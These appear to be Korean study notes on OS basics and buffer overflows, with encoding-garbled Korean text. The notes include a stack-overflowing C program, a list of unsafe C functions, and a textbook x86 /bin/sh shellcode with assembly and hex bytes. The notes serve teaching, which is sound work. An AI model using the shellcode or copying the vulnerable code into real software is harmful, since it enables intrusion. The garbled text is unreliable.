09. Buffer Overflow

ėž‘ė„ą 2026. 6. 12.·ėˆ˜ė • 2026. 6. 12.

OS Overview

Operating System

  • Multiprogrammingė€ íšĻėœĻė„ąė„ ėœ„í•ī 필ėš”í•Ļ.
    • ë‹Ļėž ė‚ŽėšĐėžëŠ” CPUė™€ I/O ėžĨėđ˜ëĨž 항ėƒ 바ė˜ęēŒ ėœ ė§€í•  ėˆ˜ ė—†ėŒ.
    • Multiprogrammingė€ CPU가 항ėƒ ė‹Ī행할 ėž‘ė—…ė„ 갖도록 ėž‘ė—…(ė―”ë“œ 및 데ėī터)ė„ ęĩŽė„ą
    • ė‹œėŠĪ템ė˜ ė „ėēī ėž‘ė—… ėĪ‘ ėžëķ€(subset)는 ëДëŠĻëĶŽė— ėœ ė§€ëĻ.
    • 하나ė˜ ėž‘ė—…ėī ė„ íƒë˜ė–ī job schedulingė„ í†ĩí•ī ė‹Ī행ëĻ.
    • ėž‘ė—…ėī 대ęļ°í•īė•ž 할 때(ė˜ˆ: I/O 대ęļ°), OS는 ë‹ĪëĨļ ėž‘ė—…ėœžëĄœ ė „환í•Ļ.
  • Timesharing(multitasking)ė€ ė‚ŽėšĐėžę°€ ė‹Ī행 ėĪ‘ėļ 각 ėž‘ė—…ęģž ėƒí˜ļ ėž‘ėšĐ할 ėˆ˜ ėžˆë„록 CPU가 ėž‘ė—…ė„ ë§Īėš° ėžėĢž ė „환하는 녾ëĶŽė  확ėžĨėž„.
    • 대화형(interactive) ėŧīí“Ļ팅ė„ ėƒė„ąí•Ļ.
    • ė‘ë‹ĩ ė‹œę°„ė€ ėķĐëķ„히 ė§§ė•„ė•ž í•Ļ.
    • 각 ė‚ŽėšĐėžëŠ” ëДëŠĻëĶŽė—ė„œ ė‹Ī행 ėĪ‘ėļ ėĩœė†Œ 하나ė˜ 프로ę·ļëžĻė„ 가ė§ →\rightarrow process
    • ė—ŽëŸŽ ėž‘ė—…ėī 동ė‹œė— ė‹Ī행 ėĪ€ëđ„ę°€ 된 ęē―ėš° →\rightarrow CPU scheduling
    • Processë“Īėī ëДëŠĻëĶŽė— 맞ė§€ ė•ŠëŠ” ęē―ėš°, swappingė„ í†ĩí•ī ė‹Ī행ė„ ėœ„í•ī ë„Ģęģ  빌
    • ëДëŠĻëĶŽė— ė™„ė „히 ė ėžŽë˜ė§€ ė•Šė€ processė˜ ė‹Ī행ė„ 허ėšĐ하는 virtual memory

Operating System Operations

  • Dual-mode operationė€ OS가 ėžė‹ ęģž ë‹ĪëĨļ ė‹œėŠĪ템 ęĩŽė„ą ėš”ė†ŒëĨž ëģīí˜ļ할 ėˆ˜ ėžˆęēŒ í•Ļ.
    • User modeė™€ kernel mode
    • 하드ė›Ļė–īė— ė˜í•ī ė œęģĩ되는 mode bit
      • ė‹œėŠĪ템ėī user codeëĨž ė‹Ī행 ėĪ‘ėļė§€ kernel codeëĨž ė‹Ī행 ėĪ‘ėļė§€ ęĩŽëģ„하는 ęļ°ëŠĨė„ ė œęģĩí•Ļ.
      • ėžëķ€ 멅ë đė–ī는 íŠđęķŒ(privileged) 멅ë đė–ī로 ė§€ė •ë˜ė–ī kernel modeė—ė„œë§Œ ė‹Ī행 가ëŠĨí•Ļ.
      • System callė€ ëŠĻ드ëĨž kernel로 ëģ€ęē―하ęģ , í˜ļėķœė—ė„œ 반환될 때 user로 ėžŽė„Īė •í•Ļ.

Process Management

  • Process
    • ė‹Ī행 ėĪ‘ėļ 프로ę·ļëžĻ
    • ė‹œėŠĪ템 ë‚ī ėž‘ė—…ė˜ ë‹Ļėœ„
    • 프로ę·ļëžĻė€ ėˆ˜ë™ė (passive) 개ėēīėīëĐ°, process는 ëŠĨ동ė (active) 개ėēīėž„.
  • Process는 ėž‘ė—…ė„ ėˆ˜í–‰í•˜ęļ° ėœ„í•ī ëĶŽė†ŒėŠĪ가 필ėš”í•Ļ.
    • CPU, ëДëŠĻëĶŽ, I/O, file
    • ėīˆęļ°í™” 데ėī터
  • Process ėĒ…ëĢŒ ė‹œ ėžŽė‚ŽėšĐ 가ëŠĨ한 ëĶŽė†ŒėŠĪė˜ 회ėˆ˜ę°€ 필ėš”í•Ļ.
  • Single-threaded process는 ė‹Ī행할 ë‹ĪėŒ 멅ë đė–īė˜ ėœ„ėđ˜ëĨž ė§€ė •í•˜ëŠ” 하나ė˜ program counterëĨž 가ė§.
  • Multi-threaded process는 threadë‹đ 하나ė˜ program counterëĨž 가ė§.

Memory Management

  • ėē˜ëĶŽ ė „후ė˜ ëŠĻ든 데ėī터는 ëДëŠĻëĶŽė— ėžˆėŒ.
  • ė‹Ī행하ęļ° ėœ„í•œ ëŠĻ든 멅ë đė–ī는 ëДëŠĻëĶŽė— ėžˆėŒ.
  • Memory management는 ė–ļė œ ëŽīė—‡ė„ ëДëŠĻëĶŽė— 둘ė§€ ęē°ė •í•Ļ.
    • CPU utilizationęģž ė‚ŽėšĐėžė— 대한 ė‘ë‹ĩ ė‹œę°„ė„ ėĩœė í™”í•Ļ.
  • Memory management 활동
    • 현ėžŽ ëДëŠĻëĶŽė˜ ė–ī느 ëķ€ëķ„ėī ė‚ŽėšĐ되ęģ  ėžˆėœžëĐ° 누ęĩŽė— ė˜í•ī ė‚ŽėšĐ되는ė§€ ėķ”ė í•Ļ.
    • ė–īë–Ī process(또는 ę·ļ ėžëķ€)ė™€ 데ėī터ëĨž ëДëŠĻëĶŽëĄœ ėī동ė‹œí‚Īęģ  ë‚īëģī낾ė§€ ęē°ė •í•Ļ.
    • 필ėš”ė— 따띾 ëДëŠĻëĶŽ ęģĩ간ė„ 할ë‹đ(allocating)하ęģ  í•īė œ(deallocating)í•Ļ.

Storage Management

  • OS는 ė •ëģī ė €ėžĨė†Œė— 대한 ę· ėží•˜ęģ  녾ëĶŽė ėļ ë·°(view)ëĨž ė œęģĩí•Ļ.
    • 뎞ëĶŽė  ė†ė„ąė„ 녾ëĶŽė  ė €ėžĨ ë‹Ļėœ„ėļ file로 ėķ”ėƒí™”í•Ļ.
    • 각 ë§Īėēī는 ėžĨėđ˜(ė˜ˆ: disk drive, tape drive)ė— ė˜í•ī ė œė–īëĻ.
    • 가ëģ€ė ėļ ė†ė„ąė—ëŠ” ė ‘ę·ž ė†ë„, ėšĐ량, 데ėī터 ė „ė†Ą ė†ë„, ė ‘ę·ž ë°Đëē•(ėˆœė°Ļ 또는 ëŽīėž‘ėœ„)ėī 폎í•ĻëĻ.
  • File-System management
    • Fileë“Īė€ ėžë°˜ė ėœžëĄœ directoryë“Ī로 ęĩŽė„ąëĻ.
    • 누가 ëŽīė—‡ė— ė ‘ę·ží•  ėˆ˜ ėžˆëŠ”ė§€ ęē°ė •í•˜ęļ° ėœ„í•ī 대ëķ€ëķ„ė˜ ė‹œėŠĪ템ė—ė„œ access controlė„ ėˆ˜í–‰í•Ļ.
    • OS 활동ė— 폎í•Ļ되는 ęēƒë“Ī
      • File 및 directory ėƒė„ąęģž ė‚­ė œ
      • File 및 directoryëĨž ėĄ°ėž‘하ęļ° ėœ„í•œ primitives
      • Fileė„ ëģīėĄ° ė €ėžĨė†Œ(secondary storage)ė— ë§Ī핑
      • ė•ˆė •ė ėļ(ëđ„휘발ė„ą) ė €ėžĨ ë§Īėēīė— file ë°ąė—…

A View of Operating System Services

System Calls

  • OS가 ė œęģĩ하는 ė„œëđ„ėŠĪė— 대한 프로ę·ļ래밍 ėļ터페ėīėŠĪ
  • ėžë°˜ė ėœžëĄœ ęģ ėˆ˜ėĪ€ ė–ļė–ī(C 또는 C++)로 ėž‘ė„ąëĻ.
  • 대ëķ€ëķ„ ė§ė ‘ė ėļ system call ė‚ŽėšĐëģīë‹Ī는 ęģ ėˆ˜ėĪ€ Application Program Interface(API)ëĨž í†ĩí•ī 프로ę·ļëžĻė— ė˜í•ī ė ‘ę·žëĻ.
    • open() : system call
    • fopen() : API(C ė–ļė–ī 띞ėīëļŒëŸŽëĶŽ)
  • 가ėžĨ ėžë°˜ė ėļ ė„ļ 가ė§€ API
    • WindowsėšĐ Win32 API
    • POSIX ęļ°ë°˜ ė‹œėŠĪ템(UNIX, Linux, Mac OS X)ėšĐ POSIX API
    • Java virtual machine(JVM)ėšĐ Java API
  • System call 대ė‹  APIëĨž ė‚ŽėšĐ하는 ėīėœ ?
    • ėīė‹ė„ą(Portability)
    • ė‚ŽėšĐ íŽļė˜ė„ą(Ease of use)

System Call Implementation

  • ėžë°˜ė ėœžëĄœ 각 system callė—ëŠ” ëēˆí˜ļ가 ė—°ęī€ëĻ.
    • System-call interface는 ėī ëēˆí˜ļė— 따띾 ėƒ‰ėļ화된 테ėīëļ”ė„ ėœ ė§€í•Ļ.
  • System call interface는 OS kernelė—ė„œ ė˜ë„된 system callė„ í˜ļėķœí•˜ęģ  system callė˜ ėƒíƒœė™€ 반환 값ė„ 반환í•Ļ.
  • í˜ļėķœėž(caller)는 system callėī ė–īë–ŧęēŒ ęĩŽí˜„되ė—ˆëŠ”ė§€ ė•Œ 필ėš”ę°€ ė—†ėŒ.
    • APIëĨž ėĪ€ėˆ˜í•˜ęģ  OS가 ęē°ęģžė ėœžëĄœ ëŽīė—‡ė„ 할ė§€ ėīí•ī하ęļ°ë§Œ 하ëĐī ëĻ.
    • OS ėļ터페ėīėŠĪė˜ 대ëķ€ëķ„ė˜ ė„ļëķ€ ė‚Ží•­ė€ APIė— ė˜í•ī 프로ę·ļ래ëĻļ로ëķ€í„° ėˆĻęēĻė§.

API – System Call – OS Relationship

                 │                      │               
              ┌──│   user application   │◄──┐           
              │  └──────────────────────┘   │           
              │                             │           
user          ▾ open()                      │           
mode   ┌────────────────────────────────────â”ī────┐      
───────â”Ī          system call interface          ├──────
kernel └─┮───────────────────────────────────────┘      
mode     │                                    â–ē         
         │  ┌───┐                             │         
         │  │ . │                             │         
         └─▹│ . │            open()           │         
            │ . │             Implementation  │         
            ├───â”Ī             of open()       │         
          i ├───┾──────────▹  system call     │         
            │ . │              .              │         
            │ . │              .              │         
            │ . │              .              │         
            └───┘             return ─────────┘
  • System callė„ ė§ė ‘ ė‚ŽėšĐí•Ļ.

Standard C Library Example

     │#include <stdio.h>      │      
     │int main()              │      
     │{                       │      
     │    .                   │      
     │    .                   │      
    ┌┾──  printf("Greetings");◄┐     
    ││    .                   ││     
    ││    .                   ││     
    ││    return 0;           ││     
    ││}                       ││     
    │└────────────────────────┘│     
user│                          │     
mode└───▹┌──────────────────┮──┘     
─────────â”Īstandard C library├────────
kernel  ┌â”ī──────────────────◄─┐      
mode    │                     │      
        │write()              │      
        │ ┌────────────────┐  │      
        └─┾▹   write()     ┾──┘      
          │  system call   │
  • write() system callė„ í˜ļėķœí•˜ëŠ” printf() 띞ėīëļŒëŸŽëĶŽ í˜ļėķœė„ ėˆ˜í–‰í•˜ëŠ” C 프로ę·ļëžĻ

Examples of Windows and Unix System Calls

Buffer Overflow

  • ë§Īėš° ėžë°˜ė ėļ ęģĩęēĐ ëДėŧĪ니ėĶ˜
    • 1988년 Morris Wormė— ė˜í•ī ėē˜ėŒ 널ëĶŽ ė‚ŽėšĐëĻ.
  • ė˜ˆë°Đ ęļ°ėˆ ėī ė•Œë Īė ļ ėžˆėŒ.
  • ė—Žė „히 ėĢžėš” ėš°ë Ī ė‚Ží•­ėž„.
    • 널ëĶŽ 배폮된 ėšīė˜ ėēīė œ 및 ė• í”ŒëĶŽėž€ėīė…˜ė— ėžˆëŠ” ëē„ę·ļ가 많ė€ ė―”ë“œė˜ ėœ ė‚°
    • 프로ę·ļ래ëĻļë“Īė˜ ė§€ė†ė ėļ ëķ€ėĢžė˜í•œ 프로ę·ļ래밍 ęī€í–‰

Brief History of Buffer Overflow Attacks

ė—°ë„ë‚īėšĐ
1988Morris Internet Wormė€ ęģĩęēĐ ëДėŧĪ니ėĶ˜ ėĪ‘ 하나로 "fingerd"ė—ė„œ buffer overflow exploitė„ ė‚ŽėšĐí•Ļ.
1995Thomas Lopaticė— ė˜í•ī NCSA httpd 1.3ė—ė„œ buffer overflow가 발ęēŽë˜ė–ī Bugtraq ëДėžë§ ëĶŽėŠĪíŠļė— ęēŒė‹œëĻ.
1996Aleph Oneė€ Phrack ë§Īęą°ė§„ė— "Smashing the Stack for Fun and Profit"ė„ ėķœíŒí•˜ė—Ž stack ęļ°ë°˜ buffer overflow ė·Ļė•―ė ė„ ė•…ėšĐ하는 ë‹Ļęģ„ëģ„ ė§€ėđĻė„ ė œęģĩí•Ļ.
2001Code Red wormė€ Microsoft IIS 5.0ė—ė„œ buffer overflowëĨž ė•…ėšĐí•Ļ.
2003Slammer wormė€ Microsoft SQL Server 2000ė—ė„œ buffer overflowëĨž ė•…ėšĐí•Ļ.
2004Sasser wormė€ Microsoft Windows 2000/XP Local Security Authority Subsystem Service (LSASS)ė—ė„œ buffer overflowëĨž ė•…ėšĐí•Ļ.

Buffer Overflow/Buffer Overrun

  • Buffer overflow 또는 buffer overrunė€ NISTė˜ ėĢžėš” ė •ëģī ëģīė•ˆ ėšĐė–ī ė‚Žė „ė—ė„œ ë‹ĪėŒęģž 같ėī ė •ė˜ëĻ
    • "할ë‹đ된 ėšĐ량ëģīë‹Ī 더 많ė€ ėž…ë Ĩėī buffer 또는 데ėī터 ė €ėžĨ ė˜ė—­ė— ë°°ėđ˜ë˜ė–ī, ë‹ĪëĨļ ė •ëģīëĨž ëŪė–īė“°ëŠ” ėļ터페ėīėŠĪė˜ ėƒíƒœ. ęģĩęēĐėžëŠ” ėī럮한 ėƒíƒœëĨž ė•…ėšĐ하ė—Ž ė‹œėŠĪ템ė„ ėķĐ돌ė‹œí‚Ī거나, ė‹œėŠĪ템ė˜ ė œė–īęķŒė„ ė–ŧė„ ėˆ˜ ėžˆëŠ” íŠđėˆ˜í•˜ęēŒ ė œėž‘된 ė―”ë“œëĨž ė‚―ėž…í•Ļ."

Buffer Overflow Basics

  • Process가 ęģ ė •ëœ 큎ęļ°ė˜ buffer ė œí•œė„ 넘ė–ī 데ėī터ëĨž ė €ėžĨ하ë Īęģ  ė‹œë„í•  때 발ėƒí•˜ëŠ” 프로ę·ļ래밍 ė˜ĪëĨ˜
  • ėļė ‘í•œ ëДëŠĻëĶŽ ėœ„ėđ˜ëĨž ëŪė–īė”€
    • ėœ„ėđ˜ė—ëŠ” ë‹ĪëĨļ 프로ę·ļëžĻ ëģ€ėˆ˜, 파띾ëŊļ터 또는 프로ę·ļëžĻ ė œė–ī 흐ëĶ„ 데ėī터가 폎í•Ļ될 ėˆ˜ ėžˆėŒ.
    • Buffer는 processė˜ stack, heap 또는 데ėī터 ė„đė…˜ė— ėœ„ėđ˜í•  ėˆ˜ ėžˆėŒ.
  • ęē°ęģž
    • 프로ę·ļëžĻ 데ėī터ė˜ ė†ėƒ
    • ė˜ˆėƒėđ˜ ëŠŧ한 ė œė–ī ė „ė†Ą
    • ëДëŠĻëĶŽ ė ‘ę·ž ėœ„ë°˜
    • ęģĩęēĐėžę°€ ė„ íƒí•œ ė―”ë“œė˜ ė‹Ī행

Basic Buffer Overflow Example

Figure 10.1 Basic Buffer Overflow Example

Basic Buffer Overflow Stack Values

 Memory        Before             After          Contains  
 Address     gets(str2)         gets(str2)       Value of  
         │                │ │                │             
 . . . . │   . . . . . .  │ │ . . . . . .    │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbf4 │    34fcffbf    │ │    34fcffbf    │         argv
         │    4 . . .     │ │    3 . . .     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbf0 │    01000000    │ │    01000000    │         argc
         │    . . . .     │ │    . . . .     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbec │    c6bd0340    │ │    c6bd0340    │  return addr
         │    . . . @     │ │    . . . @     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbe8 │    08fcffbf    │ │    08fcffbf    │ old base ptr
         │    . . . .     │ │    . . . .     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbe4 │    00000000    │ │    01000000    │        valid
         │    . . . .     │ │    . . . .     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbe0 │    80640140    │ │    00640140    │             
         │    . d . @     │ │    . d . @     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbdc │    54001540    │ │    4e505554    │    str1[4-7]
         │    T . . @     │ │    N P U T     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbd8 │    53544152    │ │    42414449    │    str1[0-3]
         │    S T A R     │ │    B A D I     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbd4 │    00850408    │ │    4e505554    │    str2[4-7]
         │    . . . .     │ │    N P U T     │             
         ├────────────────â”Ī ├────────────────â”Ī             
bffffbd0 │    30561540    │ │    42414449    │    str2[0-3]
         │    0 V . @     │ │    B A D I     │             
         ├────────────────â”Ī ├────────────────â”Ī             
 . . . . │   . . . . . .  │ │ . . . . . .    │             
         │                │ │                │

Figure 10.2 Basic Buffer Overflow Stack Values

Buffer Overflow Attacks

  • Buffer overflowëĨž ė•…ėšĐ하ęļ° ėœ„í•ī ęģĩęēĐėžę°€ 필ėš”í•œ ęēƒ
    • ęģĩęēĐėžė˜ ė œė–ī 하ė— ė™ļëķ€ė—ė„œ ęģĩęļ‰ëœ 데ėī터ëĨž ė‚ŽėšĐ하ė—Ž íŠļëĶŽęą°í•  ėˆ˜ ėžˆëŠ” 프로ę·ļëžĻ ë‚īė˜ buffer overflow ė·Ļė•―ė ė„ ė‹ëģ„하는 ęēƒ
    • í•īë‹đ buffer가 ëДëŠĻëĶŽė— ė–īë–ŧęēŒ ė €ėžĨ되는ė§€ ėīí•ī하ęģ  ė†ėƒ 가ëŠĨė„ąė„ ęē°ė •í•˜ëŠ” ęēƒ
  • ė·Ļė•―한 프로ę·ļëžĻ ė‹ëģ„ ë°Đëē•
    • 프로ę·ļëžĻ ė†ŒėŠĪ ęē€ė‚Ž(inspection)
    • 프로ę·ļëžĻėī 큎ęļ°ę°€ ėīˆęģžëœ ėž…ë Ĩė„ ėē˜ëĶŽí•  때 프로ę·ļëžĻ ė‹Ī행ė„ ėķ”ė (tracing)
    • ėž ėžŽė ėœžëĄœ ė·Ļė•―한 프로ę·ļëžĻė„ ėžë™ėœžëĄœ ė‹ëģ„하ęļ° ėœ„í•ī fuzzingęģž 같ė€ 도ęĩŽ ė‚ŽėšĐ

Programming Language History

  • ęļ°ęģ„ ėˆ˜ėĪ€ė—ė„œ ėŧīí“Ļ터 프로ė„ļė„œė— ė˜í•ī ė‹Ī행되는 ęļ°ęģ„ 멅ë đė–īė— ė˜í•ī ėĄ°ėž‘되는 데ėī터는 프로ė„ļė„œė˜ register나 ëДëŠĻëĶŽė— ė €ėžĨëĻ.
  • ė–īė…ˆëļ”ëĶŽ ė–ļė–ī 프로ę·ļ래ëĻļ는 ė €ėžĨ된 ëŠĻ든 데ėī터 값ė˜ ė˜Žë°”ëĨļ í•īė„ė— 대한 ėą…ėž„ėī ėžˆėŒ.
  • 현대ė˜ ęģ ėˆ˜ėĪ€ ė–ļė–ī
    • 타ėž…(type)ęģž ėœ íšĻ한 ė—°ė‚°ė— 대한 강ë Ĩ한 개념ė„ 가ė§.
    • Buffer overflowė— ė·Ļė•―하ė§€ ė•ŠėŒ.
    • ė˜Īëē„í—Ī드가 발ėƒí•˜ëĐ° ė‚ŽėšĐė— ėžëķ€ ė œí•œėī ėžˆėŒ.
  • C 및 ęī€ë Ļ ė–ļė–ī
    • ęģ ėˆ˜ėĪ€ ė œė–ī ęĩŽėĄ°ëĨž 갖ė§€ë§Œ ëДëŠĻëĶŽė— 대한 ė§ė ‘ ė ‘ę·žė„ 허ėšĐí•Ļ.
    • 따띾ė„œ buffer overflowė— ė·Ļė•―í•Ļ.
    • 널ëĶŽ ė‚ŽėšĐ되ęģ , ė•ˆė „하ė§€ ė•ŠėœžëĐ°, 따띾ė„œ ė·Ļė•―한 ė―”ë“œė˜ 거대한 ėœ ė‚°ė„ 가ė§.

Stack Buffer Overflows

  • Buffer가 stackė— ėœ„ėđ˜í•  때 발ėƒí•Ļ.
    • Stack smashingėī띞ęģ ë„ í•Ļ.
    • Morris Wormė— ė˜í•ī ė‚ŽėšĐëĻ.
    • ė•…ėšĐ(exploits)ė—ëŠ” 확ėļ되ė§€ ė•Šė€ buffer overflow가 폎í•ĻëĻ.
  • ė—Žė „히 널ëĶŽ ė•…ėšĐ되ęģ  ėžˆėŒ.
  • Stack frame
    • 한 í•Ļėˆ˜ę°€ ë‹ĪëĨļ í•Ļėˆ˜ëĨž í˜ļėķœí•  때 반환 ėĢžė†Œ(return address)ëĨž ė €ėžĨ할 ęģģėī 필ėš”í•Ļ.
    • 또한 í˜ļėķœëœ í•Ļėˆ˜ëĄœ ė „닎될 파띾ëŊļ터ëĨž ė €ėžĨ하ęģ  레ė§€ėŠĪ터 값ė„ ė €ėžĨ할 ėœ„ėđ˜ę°€ 필ėš”í•  ėˆ˜ ėžˆėŒ.

Stack Frame with Functions P and Q

  ┌──────────────────┐           
P:│    Return Addr   │           
  ├──────────────────â”Ī           
  │ Old Frame Pointer│◄──┐       
  ├──────────────────â”Ī   │       
  │      param 2     │   │       
  ├──────────────────â”Ī   │       
  │      param 1     │   │Frame  
  ├──────────────────â”Ī   │Pointer
Q:│ Return Addr in P │   │       
  ├──────────────────â”Ī   │       
  │ Old Frame Pointer│◄──┘       
  ├──────────────────â”Ī           
  │      local 1     │           
  ├──────────────────â”Ī           
  │      local 2     │◄───Stack  
  ├─────────┮────────â”Ī    Pointer       
  │         ▾        │

Figure 10.3 Example Stack Frame with Functions P and Q

Programs and Processes

                          Process image in                       
                             main memory                         
                      ┌────────────────────────┐◄───────┐        
                      │ Kernel Code and Data   │ Top of Memory   
                      ├────────────────────────â”Ī                 
                      │         Stack          │                 
                      │           │            │                 
                      │           ▾            │                 
                      ├────────────────────────â”Ī                 
                      │     Spare Memory       │                 
                      ├────────────────────────â”Ī                 
                      │           â–ē            │                 
                      │           │            │                 
   Program File       │         Heap           │                 
┌───────────────┐---─▹├────────────────────────â”Ī                 
│  Global Data  │     │       Global Data      │                 
├───────────────â”Ī---─▹├────────────────────────â”Ī                 
│    Program    │     │       Program          │                 
│ Machine Code  │     │       Machine Code     │                 
└───────────────┘---─▹├────────────────────────â”Ī                 
                      │  Process Control Block │ Bottom of Memory
                      └────────────────────────┘◄───────┘

Figure 10.4 Program Loading into Process Memory

Memory        Before           After      Contains    
Address      gets(inp)       gets(inp)    Value of    
                                                      
  . . .  │   . . . .    ││   . . . .    │             
         │              ││              │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbe0 │   3e850408   ││   00850408   │    tag      
         │   > . . .    ││   . . . .    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbdc │   f0830408   ││   94830408   │ return addr 
         │   . . . .    ││   . . . .    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbd8 │   e8fbffbf   ││   e8ffffbf   │ old base ptr
         │   . . . .    ││   . . . .    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbd4 │   60840408   ││   65666768   │             
         │   ` . . .    ││   e f g h    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbd0 │   30561540   ││   61626364   │             
         │   0 V . @    ││   a b c d    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbcc │   1b840408   ││   55565758   │ inp[12-15]  
         │              ││   U V W X    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbc8 │   e8fbffbf   ││   51525354   │ inp[8-11]   
         │              ││   Q R S T    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbc4 │   3cfcffbf   ││   45464748   │ inp[4-7]    
         │   < . . .    ││   E F G H    │             
         ├──────────────â”Ī├──────────────â”Ī             
bffffbc0 │   34fcffbf   ││   41424344   │ inp[0-3]    
         │   4 . . .    ││   A B C D    │             
         ├──────────────â”Ī├──────────────â”Ī             
         │              ││              │             
  . . .  │   . . . .    ││   . . . .    │

Figure 10.6 Basic Stack Overflow Stack Values

Stack Overflow Example

(a) Another stack overflow C code

void getinp(char *inp, int siz)
{
    puts("Input value");
    fgets(inp, siz, stdin);
    printf("buffer3 getinp read %s\n", inp);
}

void display(char *val)
{
    char tmp[16];
    sprintf(tmp, "read val: %s\n", val);
    puts(tmp);
}

int main(int argc, char *argv[])
{
    char buf[16];
    getinp(buf, sizeof(buf));
    display(buf);
    printf("buffer3 done\n");
}

(b) Another stack overflow example runs

$ cc -o buffer3 buffer3.c
$ ./buffer3
Input value
SAFE
buffer3 getinp read SAFE
read val: SAFE
buffer3 done

$ ./buffer3
Input value
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
buffer3 getinp read XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
read val: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
buffer3 done
Segmentation fault (core dumped)

Figure 10.7 Another Stack Overflow Example

Common Unsafe C Standard Library Routines

FunctionDescription
gets(char *str)Read line from standard input into str
sprintf(char *str, char *format, ...)Create str according to supplied format and variables
strcat(char *dest, char *src)Append contents of string src to string dest
strcpy(char *dest, char *src)Copy contents of string src to string dest
vsprintf(char *str, char *fmt, va_list ap)Create str according to supplied format and variables

Table 10.2 Some Common Unsafe C Standard Library Routines

Shellcode

  • ęģĩęēĐėžę°€ ė œęģĩ한 ė―”ë“œ
    • ėĒ…ėĒ… overflow되는 bufferė— ė €ėžĨëĻ.
    • ė „í†ĩė ėœžëĄœ ė‚ŽėšĐėž 멅ë đėĪ„ ėļ터프ëĶŽí„°(shell)로 ė œė–īëĨž ė „ė†Ąí–ˆėŒ.
  • ęļ°ęģ„ė–ī ė―”ë“œ(Machine code)
    • 프로ė„ļė„œ 및 ėšīė˜ ėēīė œė— ęģ ėœ í•Ļ.
    • ė „í†ĩė ėœžëĄœ ėƒė„ąí•˜ęļ° ėœ„í•ī ėĒ‹ė€ ė–īė…ˆëļ”ëĶŽ ė–ļė–ī ęļ°ėˆ ėī 필ėš”í–ˆėŒ.
    • ėĩœę·žė—ëŠ” ėī ęģžė •ė„ ėžë™í™”하는 ë‹Īėˆ˜ė˜ ė‚ŽėīíŠļė™€ 도ęĩŽę°€ 개발ëĻ.
  • Metasploit Project
    • ėđĻ툎(penetration), IDS ė‹œę·ļ니ėē˜ 개발 및 exploit ė—°ęĩŽëĨž ėˆ˜í–‰í•˜ëŠ” ė‚ŽëžŒë“Īė—ęēŒ ėœ ėšĐ한 ė •ëģīëĨž ė œęģĩí•Ļ.

Example Shellcode

(a) Desired shellcode code in C

int main(int argc, char *argv[])
{
    char *sh;
    char *args[2];

    sh = "/bin/sh";
    args[0] = sh;
    args[1] = NULL;
    execve(sh, args, NULL);
}

(b) Equivalent position-independent x86 assembly code

nop                 // end of nop sled
nop
jmp     find        // jump to end of code
cont:
    pop     %esi            // pop address of sh off stack into esi
    xor     %eax,%eax       // zero contents of EAX
    mov     %al,0x7(%esi)   // copy zero byte to end of string sh (%esi)
    mov     %esi,0x8(%esi)  // save address of sh in args[0] (%esi+8)
    mov     %eax,0xc(%esi)  // copy zero to args[1] (which will be NULL)
    mov     %al,%ebx        // copy address of sh (esi) to ebx
    lea     0x8(%esi),%ecx  // copy address of args (esi+8) to ecx
    lea     0xc(%esi),%edx  // copy address of args[1] (esi+c) to edx
    int     `0x80            // software interrupt to execute syscall
find:
    call    cont            // call cont which saves next address on stack
sh:
    .string "/bin/sh "
args:
    .long   0               // space used for args array
    .long   0               // args[1] and also NULL for env array

(c) Hexadecimal values for compiled x86 machine code

90 90 eb 1a 5e 31 c0 88 46 07 8d 1e 89
46 08 89 46 0c 8d 56 0c 8d 4e 08 b0 0b
ff d0 ff 2f 62 69 6e 2f 73 68 20 20 20

Figure 10.8 Example UNIX Shellcode

Table 10.3 Common x86 Assembly Language Instructions

멅ë đė–ī (Mnemonic)ė„Ī멅 (Description)
MOV src, destsrcė˜ 값ė„ dest로 ëģĩė‚Ž(ėī동)
LEA src, destsrcė˜ ėĢžė†Œ(ėœ íšĻ ėĢžė†Œ 로드)ëĨž dest로 ëģĩė‚Ž
ADD / SUB src, destsrcė˜ 값ė„ destė— 더하거나 ëđžė„œ ęē°ęģžëĨž destė— ë‚Ļęđ€
AND / OR / XOR src, destsrcė™€ dest 값ė˜ 녾ëĶŽ AND / OR / XOR ė—°ė‚°ė„ ėˆ˜í–‰í•˜ęģ  ęē°ęģžëĨž destė— ë‚Ļęđ€
CMP val1, val2val1ęģž val2ëĨž ëđ„ęĩí•˜ęģ , ęē°ęģžëĄœ CPU flagë“Īė„ ė„Īė •
JMP / JZ / JNZ addraddr로 ė í”„ / 0ėīëĐī ė í”„ / 0ėī ė•„니ëĐī ė í”„
PUSH srcsrcė˜ 값ė„ stackė— push
POP deststack ėĩœėƒë‹Ļė˜ 값ė„ dest로 pop
CALL addraddrė— ėœ„ėđ˜í•œ í•Ļėˆ˜ í˜ļėķœ
LEAVEí•Ļėˆ˜ëĨž 떠나ęļ° ė „ė— stack frame ė •ëĶŽ
RETí•Ļėˆ˜ëĄœëķ€í„° 반환
INT numOperating system í•Ļėˆ˜ė— ė ‘ę·ží•˜ęļ° ėœ„í•œ ė†Œí”„íŠļė›Ļė–ī interrupt
NOPė—°ė‚° ė—†ėŒ 또는 ė•„ëŽīęēƒë„ 하ė§€ ė•ŠëŠ” 멅ë đė–ī

Table 10.4 x86 Registers

32bit16bit8bit (high)8bit (low)ėšĐ도
%eax%ax%ah%alė‚°ėˆ  및 I/O ė—°ė‚°ęģž interrupt í˜ļėķœ ė‹Ī행ė— ė‚ŽėšĐ되는 accumulator
%ebx%bx%bh%blëДëŠĻëĶŽ ė ‘ę·ž, system call ėļėž 및 반환 값 ė „ë‹Žė— ė‚ŽėšĐ되는 base register
%ecx%cx%ch%clCounter register
